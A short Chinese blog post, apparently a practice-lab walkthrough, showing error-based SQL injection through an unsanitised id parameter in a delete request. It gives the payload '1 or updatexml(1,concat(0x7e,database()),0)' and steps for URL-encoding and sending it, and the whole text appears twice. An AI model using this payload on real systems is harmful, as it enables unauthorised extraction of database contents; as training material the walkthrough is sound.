基于delete下的报错:
由于后台未对传进来的id进行处理,导致del注入
构造payload: 由于是id,我们不需要对1进行闭合
1 or updatexml(1,concat(0x7e,database()),0)
将id=73修改为1 or updatexml(1,concat(0x7e,database()),0),并通过url进行编码
点击send,拉到最底下
版权声明:本文为ANYOUZHEN原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。
基于delete下的报错:
由于后台未对传进来的id进行处理,导致del注入
构造payload: 由于是id,我们不需要对1进行闭合
1 or updatexml(1,concat(0x7e,database()),0)
将id=73修改为1 or updatexml(1,concat(0x7e,database()),0),并通过url进行编码
点击send,拉到最底下